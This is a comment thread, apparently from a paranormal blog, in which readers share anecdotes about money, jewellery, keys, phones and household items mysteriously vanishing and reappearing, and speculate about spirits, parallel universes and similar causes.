She spent the whole weekend agonising about where the money went. Eventually she had to ask me the difficult question no friend wants to ask. The answer was obviously , NO I didn’t touch her money. She was embarrassed to have asked me and believed me. For the record, I am not a thief. I am a respectable businessman with a lot of responsibilities and no sum big or small would be a temptation.

She rules out her son because he was in his closed room in bed. She ruled out the cashier because he opened the envelope in front of her. She was not pick pocketed en route because the envelope was in her closed bag and had she been so, the whole envelope would have been taken not a specific amount. She ruled out anyone coming into the flat because we would have seen them – its a tiny flat and the front and only door was locked.

She and I are completely stumped. The obvious answer is she miscounted. But because she needed exactly £1200 for her rent, she counted it 4 times and put it into the envelope. I truly believe her. Could this disappearing phenomena be at work? Is there any significance to the amount that disappeared? I don’t know the answer. I am interested to hear other stories concerning money. Could she have been in a parallel existence when counting, where £20 notes add up up differently? Could some being that needed £360 have borrowed it from her after she put it in her bag?

I’d love to hear people’s thoughts.

I have a ring and its Beautiful and on the inner band it says 825 or 826 its hard to read it because it looks like an old ring and theres other wrighting but i cant read it and my husbands cat braught it in the house and put it in its water bowl. I started wearing it and i take it off and place it somewhere and its gone. Ill search my whole house and never find it. Then months later ill run across it doing something and i knew that i had searched there and i have no clue how it reappears like it does. This has happened countless times and It baffles me lol If it is dop is it weird it reappears? Im not sure how old the ring is or if its real silver or if the white stone is a real diamond or not but it looks expensive and not modernly made. It only fits my pinky and it kindof looks like a ring someone would wear as an engagement ring or wedding ring so Maybe its so old it was made to fit a ring finger back in the day. Its a proven fact people are bigger nowadays than back in the early 1900s. Like how old shoes are so tiny but were worn by a grown man.

  45. Avatar Katherine Boylen says:

I have had numerous objects disappear. The most remarkable one is as follows. A couple of years back my brother and I were at Kitsalano Beach in Vancouver, BC. We had our two German Shepherds with us and we were playing fetch with a “chuck-it” stick and a vivid red hockey ball. The last time we ever saw this ball was when I threw it and it went behind a log. It vanished from this world. There were no holes or soft sand as the sand is fairly compact there. I told my dog to “search” for the ball, but the dog didn’t smell it anywhere but there. We dug a hole and searched, but to no avail. My dog was totally confused. He kept on smelling where it last was at the log, but it vanished forever. The beach was empty, as it was early spring, I didn’t throw the ball hard or far, maybe 15 feet away. Witnessed by my dogs, my brother and I.
Another thing is my car keys have gone missing, and the next day they’re back in my purse but placed lightly inside. I asked my roommate if he had moved or found them and he said no.
The last time was three days ago. I had gone outside to wash my car by hand and my shorts didnt have pockets in them, so I placed my keys on the rock retaining wall which is about knee height to me. Something told me not to place my key there, but I did. I washed my car, went to get my key and it had completely vanished. I live in a house, there was nobody else around and I was just a few feet from my key at all times. I didn’t go back in the house with my key, once I placed the key down, I washed the car then went to get the key, boom it was gone. In fact, the key that disappeared while washing my car was a cut key from my main key, as my key and keychain previous to it has also gone missing. The previous one to this I had driven home with them, and once I parked and got inside my house the keychain went missing. I’ve searched everywhere and I cannot find them. This is the third instance of my keys disappearing this year so far. At least the first time they reappeared the next morning.

How interesting, a month ago I went to get my pairing knife to chop up vegies and it was nowhere to be seen. One month later I am still searching for it. still gone. I live on my own and there is no reasonable explanation as to how it has just disappeared, other than spirit enjoy watching me analyse my mind as if I question my sanity.

This happened to me last night. Popped my phone on the bedside table after setting my alarms for work. Woke up this morning, thinking it was strange how the sky was so bright but my alarm hadn’t woken me up. Phones not there. Try ringing it, it’s been turned off and there is physically no trace of my phone. We’ve searched the house, the garden, the kitchen appliances and even the toilet cisterns. No phone. There’s also a milk carton from the fridge sitting outside on the patio half drunk and warm and none of my family sleep walk or sleep eat. We’re all light sleepers and would’ve heard one of the others or someone else entirely creep around. Worst of all my cat won’t go near my room. He’s petrified and won’t even come upstairs. Needless to say I’m freaked out because any of the possible explanations don’t make sense.

  49. Avatar Angela says:

In our first apartment between the year 2013 to 2014, random items went missing. My fiance and I would look everywhere for these things, but to no avail. We would shrug it off because most times we end up finding things when we’re not looking for it anyway. However, when both our cellphones went missing, we tore everything upside down. Cellphones is something you could misplace or not realize you might have kicked it under the couch or table or it falling into the couch, still. Nothing. For whatever reason, I decided to go into our closet and moved everything out. Guess what I found in the corner of the closet? Our cellphones, my ipod, my 3ds, his PSP, the tv remote and a quarter. Weird. We sort of shook it off and we both agreed that it was probably in one of my purses as I change purses almost every week and that I might have absentmindedly threw it in the closet. As time went by, things went missing again. We would search every where, dismiss it. Until one of our phones went missing again. We decided to check in the closet and again we found everything that was missing again in that one corner of the closet. We had then knew that anything and everything that went missing, we would look there. Every single time, it was there. I usually have a good sense of the paranormal of whether or not its good or bad, but for whatever reason, I couldn’t puck up on whatever this being was. Needless to say, I left little trinkets in the closet corner when we moved out.

Hi DOP this also has happened to me , my experience was totally unexplainable , in simple terms i had been in my small one bedroom all day apart from one occasion i briefly popped to get my dinner, i sat were i always sit , close to my wooden coffee table on that table is one candle and 4 coasters , i ate my dinner and had my can of coke on one coaster which was directly in front of me , i finished my dinner cleared up clearly undeniably seeing all 4 coaster within 2 minutes of me returning that coaster had gone , i searched the whole lounge moved all furniture, the bin..repeatedly. . I phoned my brother because i just could not comprehend what had happened .. it was quite a unnerving feeling .. i have my own theories on this , its definitely to do with major things going on in your life , parallel universe the opposite life running out of synchronicity .. this happened 100% im a intelligent open minded guy.. understanding this hard but in the cold light of day something beyond what we believe and understand is out there.. in one way its a sign , i also categorically believe in alien existence and many other things ,,i think these experiences will only ever happen to people who have that mind set..

I had a major one just two years ago. I took my passport out in the van to a job, I used it to get into a military base. on getting back home I could not find the passport. I searched the van (actually took the seats out too) my friend also did the same search. not finding it I reported it missing and applied for a new one, because the application system had changed I had to ask my parents for their birth dates and wedding dates and year. Well I found out my parents were in fact married 2 years later then they said. in fact a 2 years after I was born! they then admitted after 50years that the man I thought was my dad in fact wasn’t, my real dad had died just after I was born in 1961. this had been kept from me for all my life 50 years! a week after getting my new passport I got back in the van as usual drove it all day then I looked over to the passenger seat and sitting there was the passport right next to me! go figure that one.

mannn I’m glad I’m not the only one in this situation. Last night I was sitting in the corner of my room and putting away some new makeup I bought and an eyeliner in it’s packaging was right on the ground in one moment and had VANISHED the next. I looked everywhere in that room, even places I haven’t used for months. How could the whole package disappear?? I literally didn’t move it I just took it out of the shopping bag onto the ground and it was gone!

I think the parallel universe theories and false memory explanations make more sense than anything else but STILL. HOW. WHY. Come on world can i have my stuff back?

So I myself experienced a DOP a few days ago. I was upstairs in my room sitting on my bed relaxing after working a 12 hour shift at the hospital where i work. I usually keep an extra pair of eyeglasses on my bed and i had put them on to check my emails. After a few minutes i went downstairs to tell my husband something. My husband was sitting outside on the porch talking with my 2 sons. The only ones inside the home were my daughter, son in law who were in their room watching a movie and myself. As i reached the downstairs i removed my glasses and held them in my right hand while i stood at the front door speaking to my husband and sons. I was standing in the doorway with the front door opened about a foot. I then closed the door and went back up to my room and raised my right hand to put my glasses back on. I suddenly realized i was no longer holding my glasses. I thought i must’ve left or dropped them downstairs so i back tracked my steps but couldn’t find them anywhere. They literally disappeared straight out of my hand. My husband and sons came inside the house and i told them what happened and they searched everywhere for those glasses but we never found them. We looked everywhere even in the car knowing i never went outside. I removed all the sofa cushions and still nothing. They simply disappeared into thin air. Hopefully they will appear soon, they are an expensive pair of prescription glasses that i need back.

  56. Avatar Darren says:

I’ll preface my tale with the statement that I am likely going to be the most pessimistic of people when it comes to buying into theories of out of the realm of this universe or spiritual plane mumbo-jumbo… not judging, just stating that this has never been how my brain works. Having said that, I have landed on this blog-site, which may speak to the fact that I am interested in figuring out if there is “more out there” than the simple explanation that I am going crazy.
I subscribe to the simple theory that if something has happened to me, it has most-likely happened to someone else, and if that is the case, it will most certainly be on the Internet. Here we are.

I am currently right in the middle of my DOP experiences. I’ll call it phase 3 of who knows how many ultimately. phase 1 was the initial disappearance, phase 2 being the first reappearance, and now the item is gone again, so we’ll see if there is a Phase 4 to report.

In my case, it is a Gas can. About 3/4 full, stored in my outside garden shed. It has sat in the same spot, on the same shelf for 18 years. It lives a very boring existence. Only gets used maybe once each month, and it never travels more than a few feet (unless it is being filled). One day approx. a month ago, I went to grab it to fill my pressure washer. It was there – I filled said washer, and then put it back. I go into the shed frequently, and being mildly OCD (anal to be sure) I tend to take a bit of a visual inventory of things as I enter a room. I see if they are all in their happy little places, and I store in memory things that seem odd, out of place, or just downright missing. The gas can was in its home MANY times after the pressure washer usage. Until one day I needed it for my lawn-mower… I went to get it, but it was gone. Space it occupied was empty. So like everyone else, I searched high, low, in all the usual spots, in the unusual, and even the impossible. I decided to give it a day or two – kinda like a brain refresh, and and then made another attempt at the yard-wide/house-wide/neighborhood-wide search. Nothing. So I concluded it was theft, and I decided that one day soon when in the hardware store, I would need to buy a new one. And so I did. Purchased the new container, went to the gas station and filled it up, walked straight into the shed to put it in the place of the old one, except there was no room in that space, because there was the original 18yr old gas can… like it never left. WTF was all I could come up with. Who is playing with my mind – what awesomely creative prankster could have pulled that off, timing the return so perfectly? Wait… was it there there whole time? Did I just imagine it was gone, went and wasted the time & money to replace something that was never lost? Again… WTF. So I decided that it was prolly cool that I had 2 gas cans, both mostly full, and that it was time to get to work.

Last night… I go into my shed after about 1 week has passed since I brought home the new GC… I needed some other tools, non-gas related, but during my standard spacial awareness inventory thing I do, I noticed that the older gas can was again missing… Now I am thinking that WTF doesn’t even cut it…
Seriously… the thing is gone again? Was it maybe never back? How many times is this going to happen? If I were “losing my marbles” (not my gas can) would this not show up in other aspects of my life? I have 3 kids… they all still seem to be home and in bed every night (thank goodness)… I have 2 cars, they are present and accounted for… Just this one, insignificant gas can… And so now I am going to be in hyper-sensitive gas can awareness mode, looking for some sort of explanation for this. So much so, I may actually google it, and see if this has happened to anyone else. Wait, what ???

Ok… It’s getting out of hand & like so many other people, my brain really hurts from trying to figure the disappearing objects out!!?????? I have begun keeping a journal of all the weird stuff ( on my 3rd journal!!)This most recent event – skipping through EVERY PLAY, here’s the jist of it. Wore both of my diamond rings (that I wear everyday) to the office. As routine, I always put them in a zipper pocket inside my purse when the need comes to put on surgical gloves. I leave the office make 1 stop at Office Depot. In the check out line I unzip the pocket & put both rings on.. Check out, go home & have 1 hr to be at a doctoral event at FSU. I take the rings off, place them together in my usual jewelry drawer as I’m getting changed. Go to leave and the ring I wear on my left hand ( wedding finger) is GONE! ??? I was in a hurry, so I grabbed another ring & on the way to the event (changing purses in the car) surched frantically through my original purse again????? No ring!!!!?? I thought perhaps MAYBE I could have set it down somewhere in my dressing room & I’ll find it when I get home.. INTERESTINGLY, at this event, shocked, I see a long time friend ( I often think about but haven’t seen in almost 8-9 months -she moved to be with a man she had met & fallen for. ***All she wanted was to BE WITH HIM, married etc…. They had been dating on & off ( “secret boyfriend”-VERY complicated situation for 3 years or so, anyway, SHE WAS THERE WITH HIM. Over cocktails, chatting & laughter the evening wraps up, we leave, get home, I look around a little- no ring, decide to go to bed & try again tomm with fresh eyes. I think a part of me didn’t want to believe this ring (6 carat+) could be gone!!!!! HOWEVER… For the next 2 days NO RING & I am totally distraught, mind is only on this ring!! 3 days later receive a text from her along with 2 pictures,… “we’re engaged”?& a picture of her new gorgeous engagement ring!! WEIRD to say the least! Mine is still gone!! My children, have even helped search for hours, I hv cleaned out my jewelry drawer, being OCD ( everything has a label & a place!) the ring is simply gone!
** 3 or 4 days before THIS disappearance, a certain face cream that I ALWAYS keep in a certain place & use everyday, has disappeared into thin air??? I even went through our trash with gloves to see if SOMEHOW I was loosing my mind & had thrown it away?? Not in the trash either! **both the ring & cream sit on/ in the same dressing table! Just to note, my dressing room is locked when I am not there bc of jewelry & other items of value & the simple reason of kids & house keepers etc. There is no logical explanation for all of the things going on in & around me lately, I believe I could write a book! I’ve literally looked at my phone, seen the time on it, come back AT LEAST 30 minutes later only to use the phone & it reads 1 minute past the time it was 30 min earlier & JUST AS I SAY ? ” what is THIS?” , “NO WAY!” The clock on the phone immediately flashes ( in front of my eyes) to a current time?? I’m always in these weird little time warps. A pair of my favorite Torry Brch sandals have also disappeared into thin air a couple of weeks ago and several of our home’s electronics are being fried. I Also experience painful physical symptoms (always 24 hrs after a patient or family member has their experience) only to fade away 24 hrs after I receive the pain. I’ve been rushed to a hospital after researching Depressive, I know things that I could not possibly know about, for example the other day, a couple (friends) arguing across the world in Tuscany Italy on vacation so I send a text to her & she freaked out! – ok- I’m ending this novel, hopefully didn’t bore you too much bc I could certainly go on! I know people really don’t care much about other people’s lives, I’m just searching for other people’s experiences & believe me, I’m educated, very organized, run a successful office & I guess extremely sensitive, empathic, & have one foot planted in the spiritual realm & one foot in the physical. (Full blown Picean) Please comment, I would lov to get your thoughts! And above all, THANK YOU EVERYONE WHO TOOK THE TIME TO READ THIS NOVEL!! It is a bit Therapeutic to to write it out in a public forum. ✨✨✨✨✨✨?✨✨✨✨

My story is nearly exactly like yours. Three days ago I used a big spoon about a foot long to get ice cream from a quart and put it in the sink the next day it was gone. Also gone at the same time a plastic salad fork spoon set that tie together 12 ” long, and a pair of pink scissors. The two large things hang on a wall rack by the stove. They have never ever left the kitchen we have no kids or pets.
I looked and looked even in unrealistic places like the fridge, my husband went and looked in every place imaginable. Like you we have no one else in the house we live alone and have no visitors. We have had things go missing and then show up where they should have been before but three things at once is pretty amazing! The Mandela Effect thing I wonder if it is involved .
Starting to worry my husband or me may fall through to some other place!

I have a long list of things that have just vanished. It’s really starting to creep me out. I live in a small 2 bdrm. 2 bath house with my 2 little dogs and a roommate (my BFF for 30+ yrs.) Anyway..in just the past month these things have gone completely missing: a brand new butcher knife still in the package, never even taken out of the store bag, a two ended eye shadow brush, a brand new eyebrow pencil , two new packs of cigarettes (never opened and one of them was in my purse when I went to sleep and gone in the morning), two nice expensive lighters, a rubber mallot, a facial hair remover, all my tweezers, WD40 pen, a pack of aaa batteries, a bread dough cutter, my deceased Mothers coat, and a a remote control. My roommate stays in her room most of the time and I work. She has her own things..and I have mine. But lately her things are missing too. We don’t have a lot of visitors and they certainly don’t wander around stealing stupid stuff from her or I. There are times when I cant find my keys..they aren’t in my purse or the kitchen counter. Then we make another round and my keys will be back in my purse. One of the lighters was on the kitchen bar as I was getting ready to go to bed and I didn’t see it right away and thought to myself,” Ill find it in the morning. It was totally gone…until yesterday. My roomie found it in the back seat of my car. WTF? The eyebrow pencil? I never take my make up out of the bathroom, and I found it in the floor board of my car 2 months later, after numerous car detailings. I could go on..but it all starts to run together. If it is spiritual, how do ya stop it?

Two days later there it is where I thought I had left it…its getting weird. I am starting to think this is something to do with evidence of time travel. I recon some future loser can back and pilfered my remote…what else can it be.

Hi, I don’t normally talk about these experiences to most people, but I have a story regarding to this that I want to tell. About a year ago I was outside my house taking a walk with my neighbor. I was a carrying a pocket knife with me, an old one that belonged to my grandfather, whom I was very close to, and the pocket knife often gave me luck and made me feel safe. So I was outside walking and was carrying it in a bag that also had my sweatshirt in it. I was walking down the side walk and around the other buildings in our neighbor when I decided I was going to go home. That was when I dug in my bag and felt around for my pocket knife. However it wasn’t there. It was weird because when I went to check my bag, no zippers were open and when I checked, it wasn’t inside my sweatshirt. Even though I was certain I hadn’t dropped it, I turned the flashlight on my phone on and started checking around. My neighbor started helping me too, but we didn’t find it. I started to feel really guilty because it was something from my grandfather that he gave to me. I worried about it every day for 2 months, until one day I got out the bag I had been carrying that night 2 months ago. When I opened it, I found my sweat shirt inside because I had forgotten to take it out months before. However, I remembered tossing it in sloppily because I was panicked, however it was folded when I opened the backpack. Now I had only unzipped the backpack slightly, so I couldn’t see inside the whole backpack. But, when I did unzip it the whole way, I found my pocket knife resting on top of my neatly folded sweatshirt. I was so frightened and excited all at once. I was glad to have found it, but I also felt scared. I asked my mom and my younger sister if they had seen it and they told me no. It has been almost a year now since the incident and it still confuses and scares me. I wonder why this happened? But sometimes the world works in mysterious ways…

I had a DOP experience happen with me for the 2nd time. It’s so strange too because Def Leppard objects were involved both times. First time was about 10 years ago, I had a ticket in the bottom drawer of my dresser in an envelope and then the ticket just vanished.. I searched all through my house, which is only 1,500 sq. ft. Never did find that ticket and I know I never moved it. And then last night I had told a co-worker of mine I would burn her a copy of a collection of Def Leppard songs and I found the CD in a drawer where I keep all of my cd’s and then I even took a pic of the case and sent it to her because I initially thought I may have sold it in a yard sale years ago- but I still had it. I text her a pic of the case and said I found it.. And then I put it on top of my dresser, but today it is nowhere to be found. I have looked everywhere. Makes me feel like I am crazy in my mind, makes no sense at all to me. I have been dealing with a lot of stress in my life right now and I was also under a lot of stress when that happened to me years ago.. Not sure how this happened, but it did.

My mother and I just experienced a DOP. The day before the disappearance, she had picked up a prescription bottle of Cipro, an antibiotic that she desperately needed for her condition. She’d run out, kept the empty bottle, and got a new prescription. She took one dose just prior to going to bed. She left the bottle on the kitchen counter to help her remember to take it the next morning. That late evening I was cleaning up the kitchen. I had no idea of where she’d left the bottle, but I was certain it was not on the kitchen counter. I did NOT throw away anything, nor put any prescription bottles away.

The next morning, my mother woke me up in a panic. She could not find her prescription of Cipro. We looked EVERYWHERE we could think. Garbage bin. Drawers. Cabinets. Floor. We have a cat and while he has carted things around in his mouth, they’re always small. Even presuming he might have taken the pill container (highly unlikely), we looked everywhere. NOTHING. ABSOLUTELY NOTHING. Drawers. Pockets. Pocketbooks. She was absolutely certain she left the bottle in the kitchen. But we searched the WHOLE HOUSE. NOTHING. So… she called up and got her prescription reinstated and got another bottle.

We never found that other bottle. It is SO BIZARRE. Never before have we ever experienced this. It was rather distressing for me, a man of logic who is always keen to find the explanations to things. My tenacity usually pays off. But this… THIS REMAINED A MYSTERY.

So many things have been disappearing for some reason.. Like last week, a piece of pizza disappeared out of the box. Last night, My PHONE disappeared (Still haven’t found it…). My grandma’s paper towels also disappeared yesterday. And I even tried CALLING my phone and i got 0 response. I don’t know how I am going to find any of it. And this is freaking me out because my phone was on the charger when it disappeared, the paper towels were on the counter, and the pizza was obviously in the box. I knew exactly where all of them were when they just disappeared. I looked everywhere for my phone, Oh yeah, my KEYS disappeared too.. They were on the couch.. I don’t know what I am going to tell my mom when I don’t have my house keys, or my phone. If you see this comment, please tell me where I am ever going to find any of my stuff. Thank you for reading.

Hey my friend’s family is having some weird DOP. We have found many knifes around the house that was missing. Like for example my friend has dagger. He walks out of the room for a minute and then when he went back in the room it wasn’t there. We found it where we found the other ones. In the living room when it wasn’t even close to the living room. I don’t know what’s going on. I’m 9 months pregnant and its scaring me. Help please

It’s already been 8 years when this happened. The incident still bothers me and i am still trying to figure this out. I was 10 and i was responsible for collecting money for a class party. I used to keep the money in a plastic bag and one day while i was re-counting the amount collected, all the coins fell through a hole in the bag. I searched everywhere for the coins and in the end i found only like $3 when the bag had $ 5 to $6. Now i was in the closet and i searched everywhere: in the shoes, behind the door.. i searched the whole room. I later convinced myself that maybe i had wrongly counted the money the first time. Then, i guess one week later, i was at school and my friend and i were going somewhere with the money bag when the bag punctured a second time and all the coins scattered on the stairs. We picked them up and once again the money was less than what i had. Over the years i convinced myself that maybe i had not counted properly and as i was only 10 it was most likely to make such mistakes.
Now it has happened many times that i displace objects unconsciously ( that’s what i have assumed after finding objects not in the place where i’d kept them) but these 2 incidents with the money were more serious because it was actually lost and not misplaced.

This is insane, guys. Its seems that whatever the reason, these missing items have been going even more frequent in the past 5 years or so. I personally think it cud be some type of lesser being taking them, either with playful or impish intent. :0 so strange!

Now, I have a question for the OP, as well as anyone else who mite have an answer. Over the past 5 years or so, I have noticed alarmingly that sometimes when I become interested it something, like a flavor of yogurt, a show, a candy bar, a game, a perfume, a type of makeup, it is soon discontinued or not sold where I am. Now, when I say sometimes, I mean that it happens a few times a month at the most. And when i say soon, i mean right after i buy it once or twice. Its been very frustrating and sad. My boyfriend didn’t even believe me until last year, when he also noticed it. Am I bad luck? I try to live a life of positivity & love, so I don’t think its karma. And it could be all coincidence that its happening to me, at the “right” time, but I would be silly if I didn’t see the pattern here.

And yes, I have had items mysteriously disappear. 🙁

YES! Loreal lip stain, was a REAL stain, NOT LIPSTICK they now call stain, its not. Then my fave NAVY Chanel mascara, gone. Can’t find a good brand. Yogurt used to be 6 oz, barely a portion, as serving is usually a cup, 8 oz., now cheapskates cut to 5.3. I’m hungry! NO wonder getting so skinny! There’s others, I just can’t recall, always something good, tho or they change the formula. Like the Ultra bright in the 70’s was so bomb tasting. And Herbal essence shampoo was very herbal scented, not bland. Now everything is just yucky!

Dave, don’t despair. Many of us as you can see from the posts are having very strange experiences. I have had many object disappear without a trace. Occasionally they come back. Very recently I had a lighter disappear although I was sure I had recently seen it in the drawer where I keep such things. Finally gave up and bought another one of a different color. Several days later I was looking through some catalogues that I keep on the coffee table in a large flat basket. I started to look away and out of the corner of my eye caught a movement, then heard a “plop” as though something had landed near by, looked back at the basket on the table, and there, in the very center of the shallow basket was the lighter. No way I could have missed it before, I’m sure I witnessed the re-manifestation of this object. I have more examples, but I am really beginning to feel that time and space and all objects in that continuum are beginning to break down or perhaps the borders between parallel realities are beginning to be porous. Why or to what end I can’t imagine.
I’m fortunate to have friends in my religious community that are experiencing similar things, otherwise I might start to thing I’m crazy or hallucinating. Just be careful who you tell. Think of yourself as someone who is on the cutting edge of a new and exciting reality

DON’T DO IT! Maybe it’s from being a TI (targeted individual), which I and many others are. Some don’t even realize it! I’ve had the most bizarre life imaginable. I could literally make a movie. TRUTH! Perps are known to take things, move them around, bring them back with other things not yours,, amongst a host of other atrocities they perpetrate on TI’S. Also, EMF mind control harassment, a myriad of dirty tricks. Google it. Many are TI’S and don’t even realize it! Also, do any of you have RH negative blood, by chance? We verifiably cause electrical interferences and other anomalies. This happens to me ALL THE TIME! Today, I just felt I’m losing it; being stressed out going through a divorce, biz probs, in pain from a car wreck not my fault; just the usual BS that can mess up your mind. TODAY’S INCIDENT IS WHAT BROUGHT ME HERE! I recently bought a classic car from out of state, put the title on my nightstand, (so I won’t misplace it!, being unorganized lately, from all the above). Anyway, I’ve vacillated for two months going to DMV, with it in the shop that whole time due to undisclosed issues, seller thankfully paid for. So, I have all these docs all over and knew Id better have it in clear sight for my appointed day. I happen to look over and it’s GONE! Another poster said they’ve lost legal docs, as well, car titles and there’s a high knife occurrence, (Ive experienced those, too, only mine MOVE! I HAVE WITNESSES to those incidents, where one literally flew 3 ft off a counter after I put it down. Another flew earlier off my kitchen island.) Anyway, back to the title. I looked all day everywhere, the trash even. I’m crying, as I had a falling out with seller, due to the inexpensive repairs he resentfully paid for. Im literally sweating now, wondering if I can get a pink slip with a plate only. I tear through all the drawers, filing cabinet, everything, knowing I put it on the nightstand! Finally, after reading this blog, I look in a 3 time prior searched drawer and guess what, THERE IT IS! I’d said “please bring back the title, you don’t need it”, as someone on here joked and I think that’s what finally worked! Many times before with keys, eyeglasses, as others have lost, will reappear where Ive searched before repeatedly. Some items are never recovered, like a precious jewelry gift my late husband gave me on our honeymoon. I can really sympathize with the lady who lost her ring. That is VERY costly, painful loss. If they mess with my anxiety and pain meds, though, IT’S ON! FYI, read Missing 411. Scary stuff! It’s not just objects, people; WE ARE DISAPPEARING, AS WELL! Keep your eyes open!

I work as tourguide. 3 years ago we did a short trek, 3 kilometer, up a hill, in Burma. Theres a pagoda rethouse in middle way, and I said to clients, lets meetup there to gather group, as some walk slower and some faster. This pagoda style resthouse is right beside road, and large as a van car, or larger actually. I tried to spot it on the way up and was buffeled that it was not there. Once up people complained that there was no resthouse, and I apologized. But lo and behold, when we went down 1h later it was there. We could all say “this building was not here when we went up”. Its same road, only one road. There it was again, large as a red bus, impossible to miss. Standing on is poles, with a silver tin roof. You don’t build anything like that in 1 h, in 50 hours maybe if theres many men. This is just a mystery. I see on this ote stories of people loosing their phones and knives, but hey, this was a pagoda resthouse! 🙂 Buddhist mystic dimension, or highly sophisticated military test, who knows…just a mystery..

    TIP

when you are looking for things that have gone missing try this

Ask St Anthony to help you find it. it really works. I lost my TV remote control I looked everywhere, I mean everywhere. After 5 weeks on and off searching I told my sister. She said ask St Anthony to help you find the object and within a few hours you will find it. so I did. I said “St Anthony can you please help me find the remote control for the TV in this room. I swear within 10 minutes I found it, under the bed….where I had looked about a dozen times.! please try it and report your success on here.

  78. Avatar Jay says:

Ok. So This is really werid. I have recently moved into a very small living arrangement and don’t have much space at all to lose anything at all. But for some reason 2 things have came up missing with no explanation at all.

I’m known for losing simple things…. And i am very aware of the likely hood of human error, BUT this is diffrent, First my xbox controller….. Just vanished …. I tore my room up and down looking for it and couldn’t but then simply wrote it off. Then secondly a bag of chips… I purchased 2 thereand ate one but when i went back for the 2nd bag they were not there. I looked in the trash to see if I had already eaten it by mistake and I did not find two bags, I only found the one that I had admitted to eating. this was so freaky.

I get chills just talking about it because I don’t understand it and at first I thought I was crazy but I know for a fact that there is no logical explanation for both of those items to be missing I live alone and if somebody did come in here to steal something I’m sure they would took the money on the table.

I know the previous owner so I’m definitely going to ask them if they experienced anything like this as well.

  79. Avatar Olishen says:

There is an infinite amount of possibilities for us to say exactly why something “is” – another factor to consider is that everyone has a different role in this life and no one is built 100% the same even though we are all technically “one” with the universe – we lose things for many reasons, some of us might have had thoughts/feelings about the objects, maybe without really realizing we said to ourselves that we no longer sense the need for it, I can certainly say that it’s happened to me where I noticed my feelings towards certain objects literally manifested the exact outcome that was expected. Feeling a none need = disappearing of the object, the object will feel the drift and could very well be following your unconscious or conscious decision. Of course like I mentioned there are too many possibilities, we can never be sure, but at the same time, we have to follow our instincts because we are all Divine beings who are connected to an abundance of information, if we become aware and alive in the moment, the information becomes more clear. Everyone’s reasoning is unique; everyone is their own universe so never expect one’s answer to be the right one for you. However, use other’s input freely and lovingly.

I myself have experience this DOP last night. I was in my apartment with my boyfriend and was leaving to widraw some money in my dad’s atm card (he lend it to me) as we were about to leave, i suddenly remembered about the atm card and i quickly went over to my black leather bag and get it (i was using another hand bag that night) i fully remember the details of me putting that atm card inside the pocket of my hand bag and closing the zipper so that it’s ‘secure’. So as me and my boyfriend went outside my bag was placed in front of me the whole time so it won’t get snatched or what. But as we arrive to the bank’s atm machines, i quickly opened my handbag and when i was about to reach for the atm card, it was gone. But the weird thing is there was a 100peso (i’m from ph) inside the pocket where my atm should be. I don’t remember putting a 100peso inside that pocket. We quickly went home to my apartment and looked everwhere if ever I misplaced it or not. But i fully remember every detail that i was doing before we leave. From where I was standing to what am I holding. Everything. But now, the atm is nowhere to be seen. And my parents are furious. They thought i misplace it or it was snatched. How can I explain this to them? And If the DOP is true, how can I convince them?

The assigment notebook dissapeared and reapeared two times but the rest of my things never turned up. The dissapearing object phenomenon seemed to stop when I was in freshmen year but a recent occurence disturbed me when my portable charger and the cord to charge it dissapeared at the same time but the wall plug was still there along with everything else. I was unhappy when it happened. This has been frustrating me and I want to kno why this is happening to me. Just today I opened my iPhone box by removing the upper cover, remove the paper on top, removed iPhone, then removed thin cardboard that held the phone in place in the box and placed them them all down on the bed where I was standing in front of so I could get at the earphone container because I was placing the actual earphones back in them. Once done I preoceeded to put everything back and close the box. I placed the earphones and with its case back inside the box but when I was about to fetch the thin piece of cardboard that cradled the phone inside the box I couldnt find it. I thought that perhaps I just placed it under a pillow or dropped it on the floor but could not find it. This all happened within 1 minute’s time. I thought it can’t be far from where I was srtanding since I haven’t moved a foot so I continued my search flipping everything around like pillows and blankets but still nowhere. I started to freak out a bit thinking I was going nuts so I turned my whole room upside down looking inside trash can and underneath everything. Even started venturing in restrooms and other parts of the house. I finally gave up looking for this piece of cardboard because I was literally out of breath searching everywhere. That’s when I payed down and did a search on “mysteriously disappearing things” and here I am. Still cannot get my head around it but reading all these similar cases kind of at least puts my mind at ease that im not crazy and I’m not the only one who has this happen to them.

I found this site while looking for suggestions on where/how to look for an object that seems to have disappeared into thin air. Earlier this morning I was sitting on the couch with my husband. My fingers were a bit swollen so I pulled my rings up above my knuckles to relieve the discomfort (until my coffee took care of the bloating). I had just pointed out a band of discoloration from my wedding ring that happens when my pH changes (a monthly occurance). I wear 3 rings. My wedding band on my left hand, and 2 rings on my right hand. About a minute after I showed the tarnish stain to my husband, my wedding band slipped off my finger. No biggie–so I thought at first. Our couch has a solid cover on it, which means nothing can fall between the cushions. I looked around where I was sitting. How could it not be right there?! Then I stood up to get a broader look. Nothing. I combed through my hair, removed, patted down, and shook out my robe and pjs. My husband did the same. Nothing. I removed the couch cover (as if the ring could have magically passed through it), and removed the cushions. I shook the area rug, sifted through everything within a 5 ft radius. Nothing! How is this possible?! Just for the record, I am very happily married, and deeply in love with my husband. I don’t see how this event could have any obvious metaphorical purpose. I would love any suggestions and/or words of wisdom or consolation. Thanks for reading this.

Watch I and see your ring will reappear. It’s crazy but I’m so thankful

Wow this is crazy.. I woke up this morning missing the sock I left on my foot. I normally take one off and keep one on but this morning I couldn’t find it anywhere! Only the sock I took off my foot was found. I told my wife to help me look and we both looked everywhere. It puzzled her that we couldn’t find it anywhere. She did all the laundry and couldn’t locate it. 2 months ago it was both my remotes that disappeared and today it was my 1 sock that I normally keep on my foot. Seems dumb but it is really messing with my mind. I’ve read today that it could possibly be Fallen Angels. Not sure what to believe in these days when unexplained phenomenon occurrences are right in my face!

I searched under my bed and removed everything on top of my bed, but nothing. I thought it was so weird, but I just went down stairs to get another pair. When I came back to my room, I started cutting again, when all of a sudden, I feel maybe a prescence, I don’t know, but when I looked beside me, there were the scissors in plain sight. That freaked me out so much…how is that possible?

I swear , this is completely true . I have a small butter dish , on the dresser , next to my bed , on which I keep a small butter dish ( R.R. dining piece ) on which I keep a B.P. pill I take every morning . I awoke a few days ago and upon the dish were placed three sharpened pencils of mine , aligned Up – Down -Up , underneath was the pill . I would never do this , ever . But , what was even weirder was that the middle pencil’s metal eraser holder was completely missing . I happened to look down on the carpet and found it…. chewed up , along with the eraser into an unrecognizable lump. The other person in my house swore that they did not have a anything to do with this , I believe him. I firmly believe this was some kind of message sent to me by a demonic entity of some kind . What it means , I have no idea . Once again , I swear this is 100 % true and did happen .

I am not sure this applies to money but I had a large amount of money in three different stacks. It was stored in an envelope, in my handbag, which was then secured in my closet. The next morning sums were missing from all three stacks in amounts.

